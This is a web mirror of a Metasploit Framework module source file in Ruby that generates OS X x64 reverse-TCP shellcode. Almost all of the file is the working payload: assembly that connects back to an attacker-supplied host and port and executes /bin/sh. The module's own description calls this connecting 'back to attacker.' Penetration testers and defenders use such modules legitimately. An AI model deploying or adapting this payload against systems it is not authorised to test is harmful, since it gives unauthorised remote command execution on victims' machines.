Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
21549 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 128

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Osx

11
  include Msf::Sessions::CommandShellOptions

12


13
  def initialize(info = {})

14
    super(

15
      merge_info(

16
        info,

17
        'Name' => 'OS X x64 Shell Reverse TCP',

18
        'Description' => 'Connect back to attacker and spawn a command shell',

19
        'Author' => 'nemo <nemo[at]felinemenace.org>',

20
        'License' => MSF_LICENSE,

21
        'Platform' => 'osx',

22
        'Arch' => ARCH_X64,

23
        'Handler' => Msf::Handler::ReverseTcp,

24
        'Session' => Msf::Sessions::CommandShellUnix

25
      )

26
    )

27


28
    # exec payload options

29
    register_options(

30
      [

31
        OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),

32
        Opt::LHOST,

33
        Opt::LPORT(4444)

34
      ]

35
    )

36
  end

37


38
  # build the shellcode payload dynamically based on the user-provided CMD

39
  def generate(_opts = {})

40
    lhost = datastore['LHOST'] || '127.0.0.1'

41
    # OptAddress allows either an IP or hostname, we only want IPv4

42
    unless Rex::Socket.is_ipv4?(lhost)

43
      raise ArgumentError, 'LHOST must be in IPv4 format.'

44
    end

45


46
    cmd = (datastore['CMD'] || '') + "\x00"

47
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')

48
    encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')

49
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })

50


51
    shell_asm = %(

52
      mov eax,0x2000061

53
      push 0x2

54
      pop rdi

55
      push 0x1

56
      pop rsi

57
      xor rdx,rdx

58
      syscall

59
      mov r12,rax

60
      mov rdi,rax

61
      mov eax,0x2000062

62
      xor rsi,rsi

63
      push rsi

64
      mov rsi, #{encoded_host_port}

65
      push rsi

66
      mov rsi,rsp

67
      push 0x10

68
      pop rdx

69
      syscall

70
      mov rdi,r12

71
      mov eax,0x200005a

72
      mov rsi,2

73
      syscall

74
      mov eax,0x200005a

75
      mov rsi,1

76
      syscall

77
      mov eax,0x200005a

78
      mov rsi,0

79
      syscall

80
      xor rax,rax

81
      mov eax,0x200003b

82
      call load_cmd

83
      db "#{cmd}", 0x00

84
    load_cmd:

85
      pop rdi

86
      xor rdx,rdx

87
      push rdx

88
      push rdi

89
      mov rsi,rsp

90
      syscall

91
    )

92


93
    Metasm::Shellcode.assemble(Metasm::X64.new, shell_asm).encode_string

94
  end

95
end

96


97